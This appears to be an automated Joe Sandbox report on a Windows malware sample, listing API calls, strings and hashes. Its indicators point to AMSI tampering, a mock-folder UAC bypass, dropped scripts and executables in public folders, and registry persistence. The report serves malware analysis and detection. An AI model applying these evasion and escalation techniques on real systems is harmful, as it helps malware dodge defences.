OpenSession, xrefs: 02ED415C, 02ED4308, 02ED448B, 02ED48CF, 02ED4AC4, 02ED4C1C, 02ED4F04, 02ED517F, 02ED52FF, 02ED5638, 02ED57D2, 02ED5972, 02ED5B17, 02ED5C8B, 02ED5EDB, 02ED5F8F, 02ED624C, 02ED6344, 02ED67F3, 02ED6ACD, 02ED6C41, 02ED6DD7, 02ED6F87
C:\\Windows \\SysWOW64\\, xrefs: 02ED4826
lld.SLITUTEN, xrefs: 02ED4810
.url, xrefs: 02ED5D97
C:\Users\Public\, xrefs: 02ED5D8C, 02ED6FF7
IconIndex=, xrefs: 02ED6DB1
C:\\Users\\Public\\Libraries\\, xrefs: 02ED6173
ScanString, xrefs: 02ED3F07, 02ED49CC, 02ED4E0C, 02ED5001, 02ED55BC, 02ED5756, 02ED5A9B, 02ED5E5F, 02ED64F6, 02ED6CDC, 02ED6E53, 02ED6F0B
/d , xrefs: 02ED64B9
Initialize, xrefs: 02ED587A, 02ED5C0F, 02ED600B, 02ED61D0, 02ED643C, 02ED6572, 02ED6777
HotKey=, xrefs: 02ED6EE5
URL=file:", xrefs: 02ED6D5B
ScanBuffer, xrefs: 02ED3FFF, 02ED4206, 02ED4384, 02ED4507, 02ED4583, 02ED473A, 02ED494B, 02ED4B40, 02ED4D90, 02ED4F80, 02ED51FB, 02ED5473, 02ED56B4, 02ED59EE, 02ED5D07, 02ED6087, 02ED63C0, 02ED666A, 02ED686F, 02ED69D5, 02ED6B49, 02ED6BC5
C:\Users\Public\pha.exe, xrefs: 02ED551F
C:\Users\Public\alpha.exe, xrefs: 02ED54E9

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FileLibrary$Sleep$FreeLoad$AddressAttributesCloseCreateDeleteExecInitProcStringUnicodeWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 2175072069-3926298568
Opcode ID: 4c95b42bc2c796e548fbac551f5887acd588d653f7b2326e4e84e99e4aa38141
Instruction ID: c7c26df20531f502713585b477a0057079d36605ebb2dc8b45e113fcc2e4325e
Opcode Fuzzy Hash: 4c95b42bc2c796e548fbac551f5887acd588d653f7b2326e4e84e99e4aa38141
Instruction Fuzzy Hash: 4C431C34B8016D8BDB11EB64DC91ADE73B6BF85304F20D1A9E409AB695DF30AE42CF45

Function 02ECE67C Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02EC8798: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824

Part of subcall function 02EC895C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize,02F373A8,02ECA940,UacScan), ref: 02EC8970
Part of subcall function 02EC895C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02EC898A
Part of subcall function 02EC895C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02F373A8,02ECA58C,ScanString,02F373A8,02ECA940,ScanBuffer,02F373A8,02ECA940,Initialize), ref: 02EC89C6

WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50,OpenSession,02F37380), ref: 02ECED72
CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50,OpenSession), ref: 02ECED7A
CloseHandle.KERNEL32(000008F4,00000000,00000000,000000FF,ScanString,02F37380,02ECEF50,OpenSession,02F37380,02ECEF50,UacScan,02F37380,02ECEF50,ScanBuffer,02F37380,02ECEF50), ref: 02ECED83

Strings

OpenSession, xrefs: 02ECE715, 02ECE8BA, 02ECEA6A, 02ECEB9B, 02ECEC92, 02ECEDDE
NtSetSecurityObject, xrefs: 02ECEEC4
Initialize, xrefs: 02ECEB4C, 02ECED8F
ntdll, xrefs: 02ECEEC9, 02ECEEDA
AmsiOpenSession, xrefs: 02ECE818
ScanString, xrefs: 02ECE76E, 02ECE913, 02ECEADB, 02ECED03
NtOpenProcess, xrefs: 02ECEED5
)"C:\Users\Public\Libraries\dlftfmtN.cmd" , xrefs: 02ECE7F5, 02ECE9B7
ScanBuffer, xrefs: 02ECEBEA, 02ECEE2D
UacScan, xrefs: 02ECE6BC, 02ECE861, 02ECE9F9, 02ECEC39, 02ECEE7C
Amsi, xrefs: 02ECE829

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CloseHandleLibrary$AddressCreateFreeLoadObjectProcProcessSingleUserWait
String ID: )"C:\Users\Public\Libraries\dlftfmtN.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
API String ID: 3727808169-3795744720
Opcode ID: 6e6e133e1b0ab44c7fa2cd6c33191a85be0f927abf419c732a5ef891273729fd
Instruction ID: b202906c995e9cd968b65aa97eda8995773d51df615cb6da9ea50625b63bcfb0
Opcode Fuzzy Hash: 6e6e133e1b0ab44c7fa2cd6c33191a85be0f927abf419c732a5ef891273729fd
Instruction Fuzzy Hash: 7A222634A8015D9BEB12FBA4D991BCF73BABF45300F20D1A5F009AB295DA30AD46CF55

Function 02EB1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02EB1FC1), ref: 02EB17D0
Sleep.KERNEL32(0000000A,00000000,?,02EB1FC1), ref: 02EB17E6

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 55a348297e55085b02cc6d6079e9087c71a91585ad86081cd79a8f9009fdd0a7
Instruction ID: 9732117660c595f38b9b9f275d9097802315e64e9cff88670a49a90d28f91503
Opcode Fuzzy Hash: 55a348297e55085b02cc6d6079e9087c71a91585ad86081cd79a8f9009fdd0a7
Instruction Fuzzy Hash: A8B13472A802958BCB16CF28D4A0396FBE2FF863A4F19C66ED44D8F385C7309451CB90

Function 02EC88C8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02EC88D1

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

Part of subcall function 02EC7D88: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02EC7DFC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02EC8930

Strings

amsi, xrefs: 02EC88CC
DllGetClassObject, xrefs: 02EC88F6
W, xrefs: 02EC88DD

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: bff8d1446bf33fcb70b0da3882c063a94afe00f3e5fefa9f7979f1889054431b
Instruction ID: 277a4c498b802ee5141b5b4199be7f647b26b7f5a8e15135146bdaf38a129c30
Opcode Fuzzy Hash: bff8d1446bf33fcb70b0da3882c063a94afe00f3e5fefa9f7979f1889054431b
Instruction Fuzzy Hash: D4F0A45108C38179D302E3B48D49F4FBFCD4BA2224F14DA4DF1E8562D2D675D0058BA3

Function 02EB1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02EB1FE4), ref: 02EB1B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02EB1FE4), ref: 02EB1B31

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3704ea932c1211aa69a6e87c370d9586b87a9a9c13a435e5cf05fa92c9f4f12b
Instruction ID: f734ae7f0ed429c26da60a260d631df13cd960220b4be052bd7170a4bb1f2a80
Opcode Fuzzy Hash: 3704ea932c1211aa69a6e87c370d9586b87a9a9c13a435e5cf05fa92c9f4f12b
Instruction Fuzzy Hash: 3651DF71A812408FDB16CF68D9E4797BBE1AF46368F18D1AEE44CCF282D7709445CBA1

Function 02ECE4BA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02ECE5FA

Strings

ScanBuffer, xrefs: 02ECE543
Initialize, xrefs: 02ECE4EA
OpenSession, xrefs: 02ECE59C

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: e815a30852d92363c122f943cc8e6635db39e65fafddcf772d8c0aa6d5f8f903
Instruction ID: 5cefbb8768098066bd542db8242404eeff5987430b1b33ce2abdbcb174031df0
Opcode Fuzzy Hash: e815a30852d92363c122f943cc8e6635db39e65fafddcf772d8c0aa6d5f8f903
Instruction Fuzzy Hash: 62411275B901499BEB02FBE4D951ADF73FAEF88700F60E425F041A7286DA74AD028F51

Function 02EC8798 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02EC8824

Strings

Kernel32, xrefs: 02EC87E3
CreateProcessAsUserW, xrefs: 02EC87B1

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: ffbe4090f17173021cadee7952018f275f708c491bb591d37e0c1c3bd56d3140
Instruction ID: cf4f3a000bf13c2dc8180ea1d620ca7b54a49ed41ff2c31eac651e93fd1554ad
Opcode Fuzzy Hash: ffbe4090f17173021cadee7952018f275f708c491bb591d37e0c1c3bd56d3140
Instruction Fuzzy Hash: ED11D6B2684248AFEB42EED8DE51F9B77EDEB4C740F519414BA08D3640C634ED118B64

Function 02EC85CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

WinExec.KERNEL32(?,?), ref: 02EC8634

Strings

Kernel32, xrefs: 02EC8617
WinExec, xrefs: 02EC85E5

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 4a2e81a97473eaa90b2622bb9e404f5d08c730433e86a9211d1fd73d2caf2709
Instruction ID: a239f68afab995509c8b75d867af43e9443338105d93a6ed8113e225cf19840e
Opcode Fuzzy Hash: 4a2e81a97473eaa90b2622bb9e404f5d08c730433e86a9211d1fd73d2caf2709
Instruction Fuzzy Hash: C6016DB16C0248AFE702FAE4DE11B9BB7EAEB08700F619425B900D2640D634AD118A64

Function 02EC85CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E

Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9

WinExec.KERNEL32(?,?), ref: 02EC8634

Strings

Kernel32, xrefs: 02EC8617
WinExec, xrefs: 02EC85E5

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 4d718d0c4be914187080ff48958b44ca398bc2d52ad76ea6d6b1081d80714483
Instruction ID: bc837d38f559305d05d70a760597d8d0922f1eb56535fec8e578391276ab096e
Opcode Fuzzy Hash: 4d718d0c4be914187080ff48958b44ca398bc2d52ad76ea6d6b1081d80714483
Instruction Fuzzy Hash: 30F081B16C0248AFE702FBE4DE11F9FB7EEEB08700F61D425B900D3640D634AD118A64

Function 02EC5C3C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5C98
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5CC6

Part of subcall function 02EB7D6C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02EC3910,02EC5D06,00000000,02EC5D84,?,?,02EC3910), ref: 02EB7DBA

Part of subcall function 02EB7FA8: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02EC3910,02EC5D21,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EB7FC7

GetLastError.KERNEL32(00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5D2B

Part of subcall function 02EBA788: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02EBC3E9,00000000,02EBC443), ref: 02EBA7A7

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 140fecead8845d2724a3965b671fbdb74ace00e3796d928c4e9d2dab4defcfd2
Instruction ID: c97486c5b7cfdbbcd5d582d39c421ac177da5749c723eeb7bebf6d5d9ce3cc7e
Opcode Fuzzy Hash: 140fecead8845d2724a3965b671fbdb74ace00e3796d928c4e9d2dab4defcfd2
Instruction Fuzzy Hash: 95318070A803059FDB01EBA9C981BDFBBF6AF49700F90D069E404BB381D77569058FA1

Function 02ECF216 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0302BA58), ref: 02ECF25C
RegSetValueExA.ADVAPI32(000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF294
RegCloseKey.ADVAPI32(000008EC,000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF29F

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: d26090ab0b51080d0db5178f7d37736294417d6668f219590e5e07229ce5fcb4
Instruction ID: 53f29ae46c9f8367e33fee8facba6088dd181efb7ddaa8c9a453543691332315
Opcode Fuzzy Hash: d26090ab0b51080d0db5178f7d37736294417d6668f219590e5e07229ce5fcb4
Instruction Fuzzy Hash: 45112B71680205AFEB12EFA8DC91A9E7BEDEF08300B51A465B504D7695DB34EA008F54

Function 02ECF218 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,0302BA58), ref: 02ECF25C
RegSetValueExA.ADVAPI32(000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF294
RegCloseKey.ADVAPI32(000008EC,000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF29F

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 1c46638708fa7d36015267caaeb48e2f20c11a9e0d7e30235174a2e2d57a70f7
Instruction ID: a92ffdf31511aace9e361770a7fb3d74d190606198ec4a776ba3b71c6b1029bc
Opcode Fuzzy Hash: 1c46638708fa7d36015267caaeb48e2f20c11a9e0d7e30235174a2e2d57a70f7
Instruction Fuzzy Hash: 28113D71680205AFEB12EFA8DC91ADE7BEDEF08300F51A465F504D7695DB34EA008F54

Function 02EBE374 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02EBE383

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 0429ce5777ef982dec2131c53d7433393965e74984b423c80c95436b149d51e9
Instruction ID: a9433245f334c0b1c5cca442f115e1fbb377b66d63b9d5fc563f7045ea7aaf41
Opcode Fuzzy Hash: 0429ce5777ef982dec2131c53d7433393965e74984b423c80c95436b149d51e9
Instruction Fuzzy Hash: 5AF0A4647C8110CB972777389DC45EF26966F45308B98F436B4466B111CB29CC45CBB2

Function 02EB4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4D5B
SysFreeString.OLEAUT32(00000000), ref: 02EB4D6D

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: dc40ec57bf9069314f612cec49ac839f3a7453f96f95567bd9cc9034ff654ce3
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: 7AE0C2B86812015EFF0B6F218D60BF7332AAFC2B95B14E498B804CE0A0D738C400BD38

Function 02EC70EC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02EC73EA

Strings

H, xrefs: 02EC71A1

Memory Dump Source

Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true

Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd

Similarity

API ID: FreeString
String ID: H
